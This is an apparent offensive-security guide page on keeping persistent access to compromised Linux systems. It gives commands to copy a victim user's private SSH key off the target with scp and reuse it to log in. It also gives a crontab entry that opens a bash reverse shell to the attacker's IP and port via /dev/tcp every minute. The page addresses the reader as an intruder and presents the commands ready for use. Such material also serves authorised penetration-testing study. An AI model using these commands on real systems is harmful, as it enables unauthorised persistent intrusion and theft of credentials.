🧙Linux Persistence

Persistence Via SSH Keys

  • Linux is typically deployed as a server operating system and as a result, Linux servers are typically accessed remotely via services/protocols such as SSH.

  • If SSH is enabled and running on a Linux system you have compromised, you can take advantage of the SSH configuration to establish persistent access on the target system.

  • In most cases Linux servers will have key-based authentication enabled for the SSH service, allowing users to access the Linux system remotely without the need for a password.

  • After gaining access to a Linux system, we can transfer the SSH private key of a specific user account to our system and use that SSH private key for all future authentication and access.

Copying the id_rsa (Private SSH Key) from Target System to Local System

To retrieve the id_rsa (private SSH key) from the target system to your local system, use the following scp command:

scp <user>@<ip>:<path_to_id_rsa> <path_to_put>

This command copies the private key from the target system to your local system. Make sure to set the correct paths.

Setting Permissions for id_rsa

To set the appropriate permissions for id_rsa, use the following command:

chmod 400 id_rsa

This command restricts the file permissions on id_rsa to ensure it is only readable by the owner.

Logging into the Target System using the Private Key

To log in to the target system using the private key, use the following command:

ssh -i id_rsa <user>@<ip>

This command establishes an SSH connection to the target system, authenticating using the provided private key. Ensure you replace <user> and <ip> with the correct values.

Persistence Via Cron Jobs

  • Linux implements task scheduling through a utility called Cron. Cron is a time-based service that runs applications, scripts and other commands repeatedly on a specified schedule.

  • An application, or script that has been configured to be run repeatedly with Cron is known as a Cron job.

  • We can use cron jobs to execute a command or script at a fixed interval to ensure we have persistent access to the target system.

Setting Up a Cron Job for Maintaining Access

To create a cron job on the target Linux system that establishes a connection to your local system every minute, follow these steps:

  1. Create a file named "cron" with the desired cron job configuration:

    echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<your_ip>/<your_port> 0>&1'" > cron

  2. Install the cron job by updating the crontab:

    crontab cron

Important Note

After setting up the cron job, ensure you have a listener set up on your local system. This way, every minute, the target system will attempt to connect to your local system, allowing you to maintain access.

Hacker's Mantra:The art of hacking: where creativity meets technology.

PreviousWindows PersistenceNextDumping & Cracking Windows Hashes (NTLM Hashes)

Last updated